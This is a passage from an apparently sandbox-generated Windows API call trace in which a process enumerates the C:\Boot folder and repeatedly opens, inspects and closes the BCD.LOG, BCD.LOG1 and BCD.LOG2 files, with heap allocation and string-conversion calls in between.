dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD.LOG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD.LOG", lpUsedDefaultChar=0x0) returned 16 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0069.009] AreFileApisANSI () returned 1 [0069.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0069.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=16 | out: lpWideCharStr="C:\\Boot\\BCD.LOG") returned 16 [0069.010] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.010] GetLastError () returned 0x20 [0069.010] GetLastError () returned 0x20 [0069.010] SetLastError (dwErrCode=0x20) [0069.010] GetLastError () returned 0x20 [0069.010] SetLastError (dwErrCode=0x20) [0069.010] GetLastError () returned 0x20 [0069.010] SetLastError (dwErrCode=0x20) [0069.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.010] AreFileApisANSI () returned 1 [0069.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0069.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88388, cchWideChar=16 | out: lpWideCharStr="C:\\Boot\\BCD.LOG") returned 16 [0069.010] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.010] GetLastError () returned 0x20 [0069.010] GetLastError () returned 0x20 [0069.010] SetLastError (dwErrCode=0x20) [0069.010] GetLastError () returned 0x20 [0069.011] SetLastError (dwErrCode=0x20) [0069.011] GetLastError () returned 0x20 [0069.011] SetLastError (dwErrCode=0x20) [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.011] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0069.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0069.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0069.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.012] AreFileApisANSI () returned 1 [0069.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD.LOG1", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD.LOG1", lpUsedDefaultChar=0x0) returned 17 [0069.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.012] AreFileApisANSI () returned 1 [0069.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0069.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a6f8 [0069.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x7a6f8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0069.012] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.013] GetFileType (hFile=0x420) returned 0x1 [0069.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a6f8 | out: hHeap=0x20000) returned 1 [0069.013] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.013] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.013] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.013] CloseHandle (hObject=0x420) returned 1 [0069.014] AreFileApisANSI () returned 1 [0069.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a8a8 [0069.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x7a8a8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0069.014] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.014] GetFileType (hFile=0x420) returned 0x1 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8a8 | out: hHeap=0x20000) returned 1 [0069.014] CloseHandle (hObject=0x420) returned 1 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.015] AreFileApisANSI () returned 1 [0069.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a9c8 [0069.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0069.015] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.015] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0069.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.016] AreFileApisANSI () returned 1 [0069.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD.LOG2", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD.LOG2", lpUsedDefaultChar=0x0) returned 17 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.016] AreFileApisANSI () returned 1 [0069.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0069.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ac38 [0069.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0069.017] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.017] GetFileType (hFile=0x420) returned 0x1 [0069.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0069.017] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.017] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.017] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.017] CloseHandle (hObject=0x420) returned 1 [0069.018] AreFileApisANSI () returned 1 [0069.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a6f8 [0069.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a6f8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0069.018] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.018] GetFileType (hFile=0x420) returned 0x1 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a6f8 | out: hHeap=0x20000) returned 1 [0069.018] CloseHandle (hObject=0x420) returned 1 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.019] AreFileApisANSI () returned 1 [0069.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7aa88 [0069.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7aa88, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0069.019] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aa88 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.019] 